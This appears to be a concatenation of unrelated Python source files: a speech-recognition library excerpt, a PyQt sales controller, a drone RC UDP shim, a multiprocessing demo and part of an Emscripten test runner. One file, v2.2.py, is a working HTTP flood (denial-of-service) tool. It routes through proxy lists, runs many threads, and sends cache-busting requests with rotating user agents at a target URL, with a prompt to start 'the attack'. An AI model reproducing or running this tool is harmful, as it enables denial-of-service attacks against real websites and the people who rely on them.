The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <https://www.ibm.com/watson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "``username`` must be a string"
assert isinstance(password, str), "``password`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width=None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": "{}_BroadbandModel".format(language),
}))
request = Request(url, data=flac_data, headers={
"Content-Type": "audio/x-flac",
"X-Watson-Learning-Opt-Out": "true", # prevent requests from being logged, for improved privacy
})
authorization_value = base64.standard_b64encode("{}:{}".format(username, password).encode("utf-8")).decode("utf-8")
request.add_header("Authorization", "Basic {}".format(authorization_value))
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
"""Returns the absolute path of a FLAC converter executable, or raises an OSError if none can be found."""
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
compatible_machine_types = {"i686", "i786", "x86", "x86_64", "AMD64"} # whitelist of machine types our bundled binaries are compatible with
flac_converters = {"Windows": "flac-win32.exe", "Linux": "flac-linux-x86", "Darwin": "flac-mac"}
flac_converter = flac_converters.get(platform.system(), None)
if flac_converter is not None and platform.machine() in compatible_machine_types:
base_path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = os.path.join(base_path, flac_converter)
else:
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application by running `apt-get install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
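# A quick sanity check for the resolved converter (sketch; assumes the binary
# is runnable on the current platform):
#
#     import subprocess
#     flac = get_flac_converter()
#     print(subprocess.check_output([flac, "--version"]))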
def shutil_which(pgm):
"""Python 2 compatibility: backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
        if os.path.exists(p) and os.access(p, os.X_OK):
            return p
    return None # not found on PATH
class tempfile_TemporaryDirectory(object):
"""Python 2 compatibility: backport of ``tempfile.TemporaryDirectory`` from Python 3"""
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name)
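# Usage sketch for the backport above, mirroring the Python 3 context-manager
# API:
#
#     with tempfile_TemporaryDirectory() as temp_dir:
#         scratch_path = os.path.join(temp_dir, "scratch.wav")  # hypothetical file
#         # ... work with scratch_path ...
#     # temp_dir and its contents are removed on exit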
# ===============================
# backwards compatibility shims
# ===============================
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_api(self, audio_data, client_access_token, language="en", session_id=None, show_all=False):
wav_data = audio_data.get_wav_data(convert_rate=16000, convert_width=2)
url = "https://api.api.ai/v1/query"
while True:
boundary = uuid.uuid4().hex
if boundary.encode("utf-8") not in wav_data: break
if session_id is None: session_id = uuid.uuid4().hex
data = b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"request\"\r\n" + b"Content-Type: application/json\r\n" + b"\r\n" + b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" + b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" + b"Content-Type: audio/wav\r\n" + b"\r\n" + wav_data + b"\r\n" + b"--" + boundary.encode("utf-8") + b"--\r\n"
request = Request(url, data=data, headers={"Authorization": "Bearer {}".format(client_access_token), "Content-Length": str(len(data)), "Expect": "100-continue", "Content-Type": "multipart/form-data; boundary={}".format(boundary)})
try: response = urlopen(request, timeout=10)
except HTTPError as e: raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e: raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
if show_all: return result
if "status" not in result or "errorType" not in result["status"] or result["status"]["errorType"] != "success":
raise UnknownValueError()
return result["result"]["resolvedQuery"]
Recognizer.recognize_api = classmethod(recognize_api) # API.AI Speech Recognition is deprecated/not recommended as of 3.5.0, and currently is only optionally available for paid plans
|
v2.2.py
|
#!/usr/bin/env python
#version: beta-2.2
import threading
import argparse
import logging
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
parser = argparse.ArgumentParser()
parser.add_argument("url", nargs="?", type=str, help="Target URL. Format: \"http(s)://example.com/path/index.php?param1=param1_value¶m2=param2_value\"")
parser.add_argument("proxy_list", nargs="?", type=str, help="Proxy list file. Closes when file is invalid")
parser.add_argument("proxy_type", nargs="?", type=str, help="Proxy list type. Proxy Types: SOCKS5, SOCKS4, HTTP")
parser.add_argument("-p", "--port", type=int, default=80, help="URL host's port. Sets to 443 when using HTTPS protocol")
parser.add_argument("-m", "--method", type=str, default="GET", help="HTTP request method. Default: GET")
parser.add_argument("-t", "--threads", type=int, default=100, help="Max threads. Default: 100")
parser.add_argument("-d", "--debug", action="store_true", help="Enables debug mode")
parser.add_argument("--delay", type=int, default=5, help="Delay seconds to send HTTP requests. Default: 5")
parser.add_argument("--timeout", type=int, default=5, help="Set default socket connection timeout. Default: 5")
parser.add_argument("--rpp", type=int, default=777, help="Set requests per proxy. Default: 777")
parser.set_defaults(debug=False)
args = parser.parse_args()
use_proxy = True
if not args.url:
parser.print_help()
print("URL is required. Example: https://example.com/path/")
sys.exit()
if not args.proxy_list:
use_proxy = False
if not args.proxy_type and use_proxy:
parser.print_help()
print("Proxy type is required. Example: SOCKS5, SOCKS4, HTTP")
sys.exit()
if args.port < 1 or args.port > 65535:
print("Port number must be 1-65535")
sys.exit()
if args.threads < 1:
print("Invalid thread value. Minimum is 1")
sys.exit()
if args.debug:
debug = True
url = args.url
proxy_list = args.proxy_list
proxy_type = args.proxy_type
port = args.port
method = args.method
max_threads = args.threads
debug = args.debug
timeout = args.timeout
rpp = args.rpp
delay = args.delay
if debug:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.DEBUG
)
else:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.INFO
)
logger = logging.getLogger(__file__)
url = url.strip()
try:
protocol, url = url.split("://")
except ValueError:
print("Invalid URL format! Format: https://example.com/path/")
sys.exit()
except Exception as e:
print(f"Protocol/URL Split Error: {e}")
sys.exit()
try:
url, path = url.split("/", 1)
except ValueError:
path = ""
pass
except Exception as e:
print(f"URL/Path Split Error: {e}")
sys.exit()
try:
path, parameters = path.split("?")
except ValueError:
parameters = ""
pass
except Exception as e:
print(f"Path/Parameters Split Error: {e}")
sys.exit()
protocol_list = ["HTTP", "HTTPS"]
protocol = protocol.upper()
if not protocol in protocol_list:
print(f"Invalid protocol: {protocol}")
sys.exit()
if protocol == "HTTPS":
port = 443
path = f"/{path}"
if use_proxy:
proxy_type = proxy_type.upper()
parameters_str = parameters
if parameters != "":
parameters = f"&{parameters}"
if use_proxy:
try:
proxy_file = open(proxy_list, "r")
proxies = proxy_file.readlines()
proxy_file.close()
except FileNotFoundError:
print(f"Proxy list file not found!")
sys.exit()
except Exception as e:
print(f"Cannot open proxy list file: {e}")
sys.exit()
proxy_types = ["SOCKS4", "SOCKS5", "HTTP"]
try:
proxy_type_str = proxy_type
if not proxy_type in proxy_types:
raise AttributeError
proxy_type = getattr(socks, proxy_type)
except AttributeError:
print(f"{proxy_type} is not a valid proxy type! Proxy Types: SOCKS5, SOCKS4, HTTP")
sys.exit()
except Exception as e:
print(f"Proxy Type Error: {e}")
sys.exit()
if timeout != None:
try:
timeout = int(timeout)
except Exception as e:
print(f"Set Default Timeout Error: {e}")
sys.exit()
try:
url_ip = socket.gethostbyname(url)
except Exception as e:
print(f"Unable to resolve domain's IP")
url_ip = "Unable to resolve"
if url == url_ip:
url_ip = ""
else:
url_ip = f"Domain IP: {url_ip}\r\n"
if use_proxy:
proxies_length = len(proxies)
#You can uncomment this if you want.
#print(f"[---] Attack Information [---]\r\nProtocol: {protocol}\r\nURL: {url}\r\n{url_ip}Port: {port}\r\nPath: {path}\r\nParameters: {parameters_str}\r\nMethod: {method}\r\nProxy List: {proxy_list}\r\nProxy Type: {proxy_type_str}\r\nProxies: {proxies_length}\r\nTimeout: {timeout}\r\nMax Thread: {max_threads}\r\nDebug: {debug}\r\n")
try:
input("Press enter to initialize the attack.")
except KeyboardInterrupt:
sys.exit()
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
logger.info("Initializing components...")
active_threads = 0
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = list(chars)
hrs = 0
Bps = 0
total_hrs = 0
total_Bps = 0
total_socks_used = 0
initial_attack_time = 0
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"msnbot-131-253-46-102.search.msn.com",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
logger.info("Done!")
def HTTPS(host, port, proxy_host=None, proxy_port=None):
try:
global active_threads
global hrs
global Bps
global total_hrs
global total_Bps
global total_socks_used
active_threads += 1
port = int(port)
proxy_port = int(port)
rp = int(rpp)
if use_proxy:
sock = socks.socksocket()
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((host, port))
total_socks_used += 1
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
for _ in range(rp):
anti_cache_list = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache_list)
user_agent = random.choices(user_agents)
http = f"{method} {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nConnection: close\r\n\r\n"
sent_bytes = sock.send(http.encode())
Bps += sent_bytes
hrs += 1
total_hrs += 1
total_Bps += sent_bytes
time.sleep(delay)
except Exception as e:
logger.debug(f"HTTPS Error: {e}")
pass
finally:
active_threads -= 1
def HTTP(host, port, proxy_host=None, proxy_port=None):
try:
global active_threads
global hrs
global Bps
global total_hrs
global total_Bps
global total_socks_used
active_threads += 1
port = int(port)
if use_proxy:
proxy_port = int(proxy_port)
rp = int(rpp)
if use_proxy:
sock = socks.socksocket()
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
total_socks_used += 1
for _ in range(rp):
anti_cache_list = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache_list)
user_agent = random.choices(user_agents)
http = f"{method} {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nConnection: close\r\n\r\n"
sent_bytes = sock.send(http.encode())
Bps += sent_bytes
hrs += 1
total_hrs += 1
total_Bps += sent_bytes
time.sleep(delay)
except Exception as e:
logger.debug(f"HTTP Error: {e}")
pass
finally:
active_threads -= 1
def verbose_status():
try:
global hrs
global Bps
separator = " " * 6
while True:
time.sleep(1)
print(f"Threads: \u001b[32;1m{active_threads}\u001b[0;0m {separator[len(str(active_threads)):]} HR/s: \u001b[32;1m{hrs}\u001b[0;0m {separator[len(str(hrs)):]} kB/s: \u001b[32;1m{Bps / 1000:.2f}\u001b[0;0m")
hrs = 0
Bps = 0
except Exception as e:
print(f"Error initializing verbose status: {e}")
sys.exit()
def main():
try:
global initial_attack_time
initial_attack_time = time.time()
logger.info("Initializing attack...\r\n")
threading.Thread(target=verbose_status, daemon=True).start()
if use_proxy:
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy_host, proxy_port = proxy.split(":")
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=eval(protocol), args=[url, port, proxy_host, proxy_port], daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=eval(protocol), args=[url, port]).start()
except Exception as e:
print(f"Main Error: {e}")
sys.exit()
except KeyboardInterrupt:
sys.exit()
def onexit():
try:
print("\r\n")
logging.info("Attack finished\r\n")
print(f"Duration: \u001b[32;1m{(time.time() - initial_attack_time):.2f} seconds\u001b[0;0m\r\nTotal Sockets: \u001b[32;1m{total_socks_used}\u001b[0;0m\r\nTotal HTTP: \u001b[32;1m{total_hrs}\u001b[0;0m\r\nTotal Bandwidth: \u001b[32;1m{(total_Bps / 1000):.2f} kB\u001b[0;0m\r\n")
except Exception:
pass
atexit.register(onexit)
if __name__ == "__main__":
main()
|
controllerTelaSistema.py
|
from PyQt5.QtWidgets import QMainWindow
from view.telaSistema import Ui_MainWindow
from PyQt5.QtWidgets import QTableWidget,QTableWidgetItem
from model.entrada import Entrada
from model.saida import Saida
import threading, time
from datetime import datetime
class ControllerTelaSistema(QMainWindow):
def __init__(self, model):
super().__init__()
self.model = model
self.tela = Ui_MainWindow()
self.tela.setupUi(self)
        # screen transitions
self.tela.buttonEntradasESaidas.clicked.connect(self.mostrarframeEntradasESaidas)
self.tela.buttonEstatisticas.clicked.connect(self.mostrarFrameEstatisticas)
self.tela.buttonVendas.clicked.connect(self.mostrarFrameVendas)
        # end screen transitions
        # clock
contar = threading.Thread(target = self.contarSegundos)
contar.daemon = True
contar.start()
        # end clock
        # sale management
self.totalVendaAtual = 0
        ## add item value to the sale table
self.tela.buttonConfirmarEntradaVenda.clicked.connect(self.adicionarValorATabelaVenda)
        ## end add item value to the sale table
        ## add amount received for the sale
self.tela.buttonAdicionarValorRecebidoVenda.clicked.connect(self.adicionarValorRecebidoVendaEGerarTroco)
        ## end add amount received for the sale
        ## finish the sale and add it to the database
self.tela.buttonFinalizarVenda.clicked.connect(self.finalizarVenda)
        ## end finish the sale and add it to the database
        # end sale management
        # incomes and expenses listing
#self.tela.buttonConfirmarEntrada.clicked.connect()
        # end incomes and expenses listing
        # add income from the listing screen
self.tela.buttonConfirmarEntrada.clicked.connect(self.adicionarEntradaPelaListagem)
        # end add income from the listing screen
        # add expense from the listing screen
self.tela.buttonConfirmarSaida.clicked.connect(self.adicionarSaidaPelaListagem)
        # end add expense from the listing screen
        # update the grand total label
self.calcularTotalGeralDeSaldo()
        # end update the grand total label
    # screen transitions
def mostrarframeEntradasESaidas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameEntradasESaidas.show()
self.atualizarJanelas()
def atualizarJanelas(self):
self.listarEntradas()
self.listarSaidas()
self.calcularTotalGeralDeSaldo()
def mostrarFrameEstatisticas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameEstatisticas.show()
def mostrarFrameVendas(self):
self.esconderTodosOsFramesDeUso()
self.tela.frameVendas.show()
def esconderTodosOsFramesDeUso(self):
self.tela.frameEntradasESaidas.hide()
self.tela.frameEstatisticas.hide()
self.tela.frameVendas.hide()
self.tela.frameInicial.hide()
    # end screen transitions
    # clock
def contarSegundos(self):
while True:
now = datetime.now()
self.tela.relogio.setText(now.strftime("%H:%M:%S"))
time.sleep(1)
    # end clock
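    # Note: ``contarSegundos`` updates a Qt widget from a worker thread, which
    # Qt does not guarantee to be safe; a QTimer living on the GUI thread is
    # the usual alternative. A hypothetical sketch, not wired into this class:
    #
    #     from PyQt5.QtCore import QTimer
    #     self.timer = QTimer(self)
    #     self.timer.timeout.connect(
    #         lambda: self.tela.relogio.setText(datetime.now().strftime("%H:%M:%S")))
    #     self.timer.start(1000)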
    # add item value to the sale table
def adicionarValorATabelaVenda(self):
valor = self.tela.entradaValorVenda.toPlainText()
atual = self.tela.tabelaVendaItens.rowCount()
self.tela.tabelaVendaItens.insertRow(atual)
self.tela.tabelaVendaItens.setItem(atual , 0, QTableWidgetItem(valor))
self.totalVendaAtual += float(valor)
self.tela.labelTotalVenda.setText("Total: {}".format(self.totalVendaAtual))
    # end add item value to the sale table
    # add amount received and compute the change
def adicionarValorRecebidoVendaEGerarTroco(self):
recebido = self.tela.entradaValorRecebidoVenda.toPlainText()
troco = float(recebido) - float(self.totalVendaAtual)
self.tela.labelTroco.setText("Troco: {}".format(troco))
    # end add amount received and compute the change
    # finish sale
def finalizarVenda(self):
entrada = Entrada()
if self.totalVendaAtual != 0:
entrada.adicionarEntrada(self.totalVendaAtual, "venda")
limpar = threading.Thread(target = self.limparTelaVenda)
limpar.daemon = True
limpar.start()
self.atualizarJanelas()
def limparTelaVenda(self):
self.tela.entradaValorVenda.clear()
self.tela.labelTroco.setText("Troco:")
self.tela.tabelaVendaItens.setRowCount(0)
self.tela.labelTotalVenda.setText("Total:")
self.tela.entradaValorRecebidoVenda.clear()
self.totalVendaAtual = 0
    # end finish sale
    # list incomes and expenses on the listing screen
def listarEntradas(self):
self.tela.tabelaEntradas.setRowCount(0)
entrada = Entrada()
entradas = entrada.listarEntradas()
for elemento in entradas:
atual = self.tela.tabelaEntradas.rowCount()
self.tela.tabelaEntradas.insertRow(atual)
self.tela.tabelaEntradas.setItem(atual , 0, QTableWidgetItem(str(elemento[0])))
self.tela.tabelaEntradas.setItem(atual , 1, QTableWidgetItem(str(elemento[1])))
self.tela.tabelaEntradas.setItem(atual , 2, QTableWidgetItem(str(elemento[2])))
self.tela.tabelaEntradas.setItem(atual , 3, QTableWidgetItem(str(elemento[3])))
    # end list incomes and expenses on the listing screen
    # list expenses on the listing screen
def listarSaidas(self):
self.tela.tabelaSaidas.setRowCount(0)
saida = Saida()
saidas = saida.listarSaidas()
for elemento in saidas:
atual = self.tela.tabelaSaidas.rowCount()
self.tela.tabelaSaidas.insertRow(atual)
self.tela.tabelaSaidas.setItem(atual , 0, QTableWidgetItem(str(elemento[0])))
self.tela.tabelaSaidas.setItem(atual , 1, QTableWidgetItem(str(elemento[1])))
self.tela.tabelaSaidas.setItem(atual , 2, QTableWidgetItem(str(elemento[2])))
    # end list expenses on the listing screen
    # add income value from the listing window
def adicionarEntradaPelaListagem(self):
try:
valor = float(self.tela.entradaValorEntrada.toPlainText())
        except ValueError:
            print("an error occurred while parsing the value")
else:
if(self.tela.radioButtonXbox.isChecked()):
tipo = "xbox"
else:
tipo = "pc"
if valor != 0:
entrada = Entrada()
entrada.adicionarEntrada(valor, tipo)
self.tela.entradaValorEntrada.clear()
self.atualizarJanelas()
    # end add income value from the listing window
    # add expense value from the listing screen
def adicionarSaidaPelaListagem(self):
try:
valor = float(self.tela.entradaValorSaida.toPlainText())
        except ValueError:
            print("an error occurred while parsing the value")
else:
if valor != 0:
saida = Saida()
saida.adicionarSaida(valor)
self.tela.entradaValorSaida.clear()
self.atualizarJanelas()
    # end add expense value from the listing screen
    # grand total balance
def calcularTotalGeralDeSaldo(self):
totalEntradas = 0
totalSaidas = 0
entradas = Entrada().listarEntradas()
for entrada in entradas:
totalEntradas += float(entrada[0])
saidas = Saida().listarSaidas()
for saida in saidas:
totalSaidas += float(saida[0])
totalGeral = totalEntradas - totalSaidas
self.tela.labelTotal.setText("Total: {0:.2f}".format(totalGeral))
    # end grand total balance
|
rc_ipc_shim.py
|
import socket
import time
import struct
from threading import Thread
from sololink import rc_pkt
rc_sock = None
rc_attached = False
rc_actual = [1500, 1500, 900, 1500, 0, 0, 0, 0]
rc_override = [1500, 1500, 900, 1500, 0, 0, 0, 0]
def attach():
global rc_attached
rc_attached = True
def detach():
global rc_attached
rc_attached = False
def put(arg):
global rc_override
(timestamp, sequence, chan) = arg
rc_override = [chan[2], chan[1], chan[0], chan[3], chan[4], chan[5], chan[6], chan[7]]
return True
def pixrc_start():
global rc_sock
global rc_actual
if not rc_sock:
rc_sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
rc_sock.setblocking(0)
rc_actual = [1500, 1500, 900, 1500, 0, 0, 0, 0]
def listener():
global rc_sock, rc_actual
sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
sock.bind(('0.0.0.0', 13341))
while True:
try:
data = sock.recv( 1000 )
                if data is None or len(data) != rc_pkt.LENGTH:
continue
(timestamp, sequence, chan) = rc_pkt.unpack(data)
rc_actual = [chan[2], chan[1], chan[0], chan[3], chan[4], chan[5], chan[6], chan[7]]
except Exception as e:
print(e)
                if rc_sock is None:
return
t_l = Thread(target=listener)
t_l.daemon = True
t_l.start()
def sender():
global rc_sock, rc_override, rc_attached
while True:
time.sleep(.020)
pkt = struct.pack('<HHHHHHHH', *(rc_override if rc_attached else rc_actual))
try:
# print('--->', rc_attached, rc_override if rc_attached else rc_actual)
rc_sock.sendto(pkt, ('127.0.0.1', 5501))
except Exception as e:
print(e)
                if rc_sock is None:
return
t_s = Thread(target=sender)
t_s.daemon = True
t_s.start()
def pixrc_stop():
global rc_sock
if rc_sock:
rc_sock.close()
rc_sock = None
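# A usage sketch for this shim; the channel values are illustrative PWM
# microseconds, and ``put`` expects a (timestamp, sequence, channels) tuple in
# rc_pkt channel order:
#
#     pixrc_start()                 # start the listener/sender threads
#     attach()                      # switch the output to the override channels
#     put((0, 0, [1500, 1500, 1200, 1500, 0, 0, 0, 0]))
#     time.sleep(1)
#     detach()                      # fall back to the actual RC input
#     pixrc_stop()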
|
multiProcessTest.py
|
import multiprocessing
import time
import os
def work():
for _ in range(10):
print("work..")
print(multiprocessing.current_process())
print(f"subprocess pid: {multiprocessing.current_process().pid}")
print(f"parent process pid: {os.getppid()}")
time.sleep(0.2)
if __name__ == "__main__":
process_obj = multiprocessing.Process(target=work)
process_obj.start()
for i in range(9):
print(f"main processing: {multiprocessing.current_process()}")
print(f"main processing pid: {multiprocessing.current_process().pid}")
time.sleep(0.2)
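# Joining the child process makes the exit order explicit (sketch):
#
#     process_obj.join()
#     print(f"child exit code: {process_obj.exitcode}")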
|
runner.py
|
#!/usr/bin/env python2
# This Python file uses the following encoding: utf-8
'''
Simple test runner
These tests can be run in parallel using nose, for example
nosetests --processes=4 -v -s tests/runner.py
will use 4 processes. To install nose do something like
|pip install nose| or |sudo apt-get install python-nose|.
Note however that emcc now uses multiple cores when optimizing,
so you may prefer to use fewer cores here.
'''
from subprocess import Popen, PIPE, STDOUT
import os, unittest, tempfile, shutil, time, inspect, sys, math, glob, re, difflib, webbrowser, hashlib, threading, platform, BaseHTTPServer, multiprocessing, functools, stat
if len(sys.argv) == 1:
print '''
==============================================================================
Running the main part of the test suite. Don't forget to run the other parts!
sanity - tests for first run, etc., modifies ~/.emscripten
benchmark - run before and after each set of changes before pushing to
master, verify no regressions
browser - runs pages in a web browser
To run one of those parts, do something like
python tests/runner.py sanity
To run a specific set of tests, you can do things like
python tests/runner.py o1
(that runs the o1 (-O1) tests). You can run individual tests with
python tests/runner.py test_hello_world
Combinations work too, for example
python tests/runner.py browser.test_sdl_image
In the main test suite, you can run all variations (O0, O1, O2, etc.) of
an individual test with
python tests/runner.py ALL.test_hello_world
==============================================================================
'''
time.sleep(2)
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path += [path_from_root(''), path_from_root('third_party/websockify')]
import tools.shared
from tools.shared import *
# Sanity check for config
try:
  assert COMPILER_OPTS is not None
except:
raise Exception('Cannot find "COMPILER_OPTS" definition. Is %s set up properly? You may need to copy the template settings file into it.' % EM_CONFIG)
# Core test runner class, shared between normal tests and benchmarks
checked_sanity = False
class RunnerCore(unittest.TestCase):
save_dir = os.environ.get('EM_SAVE_DIR')
save_JS = 0
stderr_redirect = STDOUT # This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
env = {}
def skipme(self): # used by tests we ask on the commandline to be skipped, see right before call to unittest.main
return self.skip('requested to be skipped')
def setUp(self):
global Settings
Settings.reset()
Settings = tools.shared.Settings
self.banned_js_engines = []
if not self.save_dir:
dirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
else:
dirname = CANONICAL_TEMP_DIR
if not os.path.exists(dirname):
os.makedirs(dirname)
self.working_dir = dirname
os.chdir(dirname)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.join(self.get_dir(), '..'))
shutil.rmtree(self.get_dir())
# Make sure we don't leave stuff around
#if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def skip(self, why):
print >> sys.stderr, '<skipping: %s> ' % why,
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def hardcode_arguments(self, filename, args):
    # Hardcode in the arguments, so the generated JS is portable without manual command-line arguments
if not args: return
js = open(filename).read()
open(filename, 'w').write(js.replace('run();', 'run(%s + Module["arguments"]);' % str(args)))
def prep_ll_run(self, filename, ll_file, force_recompile=False, build_ll_hook=None):
if ll_file.endswith(('.bc', '.o')):
if ll_file != filename + '.o':
shutil.copy(ll_file, filename + '.o')
Building.llvm_dis(filename)
else:
shutil.copy(ll_file, filename + '.o.ll')
#force_recompile = force_recompile or os.stat(filename + '.o.ll').st_size > 50000 # if the file is big, recompile just to get ll_opts # Recompiling just for dfe in ll_opts is too costly
if Building.LLVM_OPTS or force_recompile or build_ll_hook:
Building.ll_opts(filename)
if build_ll_hook:
need_post = build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.pre') # for comparisons later
if Building.LLVM_OPTS:
Building.llvm_opts(filename)
Building.llvm_dis(filename)
if build_ll_hook and need_post:
build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.post') # for comparisons later
Building.llvm_dis(filename)
# Generate JS from ll, and optionally modify the generated JS with a post_build function. Note
# that post_build is called on unoptimized JS, so we send it to emcc (otherwise, if run after
# emcc, it would not apply on the optimized/minified JS)
def ll_to_js(self, filename, extra_emscripten_args, post_build):
if type(post_build) in (list, tuple):
post1, post2 = post_build
else:
post1 = post_build
post2 = None
if self.emcc_args is None:
Building.emscripten(filename, append_ext=True, extra_args=extra_emscripten_args)
if post1:
exec post1 in locals()
shutil.copyfile(filename + '.o.js', filename + '.o.js.prepost.js')
process(filename + '.o.js')
if post2: post2(filename + '.o.js')
else:
transform_args = []
if post1:
transform_filename = os.path.join(self.get_dir(), 'transform.py')
transform = open(transform_filename, 'w')
transform.write('''
import sys
sys.path += [%r]
''' % path_from_root(''))
transform.write(post1)
transform.write('''
process(sys.argv[1])
''')
transform.close()
